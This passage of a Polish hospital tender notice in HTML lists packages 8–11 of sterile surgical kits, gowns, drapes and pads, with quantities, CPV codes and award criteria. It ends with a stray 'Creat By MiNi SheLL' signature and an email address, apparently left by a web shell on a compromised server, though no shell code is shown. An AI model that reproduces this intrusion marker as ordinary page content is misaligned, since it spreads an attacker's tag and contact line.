14. fartuch dla pacjenta, wykonany z włókniny sms 35g/m2 wiązany z tyłu na troki, nieprześwitujący, 6 000;
15. sterylna ściereczka celulozowa o wym min 30x40 cm  gramatura min 52 g/m2, 500.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Pakiet 8.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 8, Nazwa artykułu, opis, Ilość [szt.]:
Sterylny zestaw do znieczuleń przewodowych, 2 500.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Pakiet 9.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 9, Lp., Nazwa artykułu, opis, Ilość [szt.]:
1. Sterylny zestaw do operacji laparoskopowych, 200;
2. Sterylny zestaw do operacji laparotomii, 100;
3. Sterylny zestaw do operacji artroskopii kolana, 62;
4. Sterylny zestaw do DHS, 200;
5. Sterylny zestaw do operacji endoprotezy biodra,  120;
6. Sterylny zestaw do operacji endoprotezy kolana, 50;
7. Sterylny zestaw do pilnego cięcia cesarskiego,  50;
8. Sterylny zestaw do operacji  guza mózgu zapakowany w zbiorczym opakowaniu, 60;
9. Sterylny zestaw do operacji kraniotomi zapakowany w zbiorczym opakowaniu, 100;
10. Sterylny zestaw do operacji mikrodisektomii zapakowany w zbiorczym opakowaniu, 100;
11. Sterylny zestaw do operacji kręgosłupa szyjnego zapakowany w zbiorczym opakowaniu,  60;
12. Sterylny zestaw laryngologiczny uniwersalny  zapakowany w zbiorczym opakowaniu, 200;
13. Sterylny zestaw do operacji endoskopia urologiczna TUR  zapakowany w zbiorczym opakowaniu, 350;
14. Sterylny zestaw do operacji cystoskopii urologicznej   zapakowany w zbiorczym opakowaniu, 100;
15. Sterylny zestaw do operacji przepukliny zapakowany w zbiorczym opakowaniu, 500;
16. Sterylny zestaw do operacji pęcherzyka zapakowany w zbiorczym opakowaniu, 500;
17. Sterylny zestaw do operacji gwóźdź śródszpikowy zapakowany w zbiorczym opakowaniu, 100;
18. Sterylny zestaw do operacji ramienia zapakowany w zbiorczym opakowaniu,  50;
19. Sterylny zestaw do operacji przedramienia zapakowany w zbiorczym opakowaniu,  100;
20. Sterylny zestaw do operacji neuroendosopii zapakowany w zbiorczym opakowaniu,  30.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Pakiet 10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 10, Nazwa artykułu, opis, Ilość [szt.]:
Folie kompatybilne z mikroskopem operacyjnym OPMI Pentero, 100.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Pakiet 11.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet 11, Lp., Nazwa artykułu, opis, Ilość [szt.]:
1. Oddychający, jednorazowy podkład absorpcyjny pod pacjenta z raną odleżynową, rozm. min. 61x91cm+/-2cm, 1 000;
2. Oddychający, jednorazowy podkład absorpcyjny pod pacjenta z raną odleżynową, rozm. min. 25x40cm+/- 2cm, 1 000;
3. Jednorazowy, pięciowarstwowy, przeciwodleżynowy podkład ochronny na stół operacyjny,  100;
4. Zestaw składający się z: -jednorazowego, pięciowarstwowego, przeciwodleżynowego podkładu ochronnego na stół operacyjny; - serweta do repozycjonowania pacjenta 100x150cm- 1szt. 
Całość zapakowana w foliową  torbę,  50;
5. Zestaw  do operacji tarczycy, 50;
6. Sterylna, jednorazowa, miękka, antypoślizgowa mata wykonana z pianki PCV, 50;
7. Sterylny, jednorazowy uchwyt na noże chirurgiczne wykonany z polistyrenu, 50;
8. Sterylne, jednorazowe żółte pudełko do liczenia igieł, 1 000;
9. Jednoczęściowy rzep typu velcro, 1 000.
Szczegółowy opis przedmiotu zamówienia wraz z ilościami oraz wymaganiami dla pakietu zawarty jest w  SIWZ nr WSZ-EP-28/2015, który jest udostępniony na stronie internetowej Zamawiającego www.szpital-konin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.14.00.00-3, 33.19.90.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin dostaw - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com